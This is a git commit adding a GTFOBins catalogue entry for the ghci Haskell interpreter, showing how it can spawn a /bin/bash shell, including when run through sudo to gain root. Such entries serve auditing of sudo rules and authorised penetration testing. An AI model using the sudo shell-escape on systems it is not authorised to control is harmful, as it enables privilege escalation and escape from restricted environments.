Add ghci binary

master
Ryan Saridar 2020-10-22 17:28:46 +01:00 committed by Andrea Cardaci
parent 106dede9da
commit 373f57fc18
1 changed files with 11 additions and 0 deletions

11
_gtfobins/ghci.md Normal file
View File

@ -0,0 +1,11 @@
---
functions:
shell:
- code: |
ghci
Prelude> System.Process.callCommand "/bin/bash"
sudo:
- code: |
sudo ghci
Prelude> System.Process.callCommand "/bin/bash"
---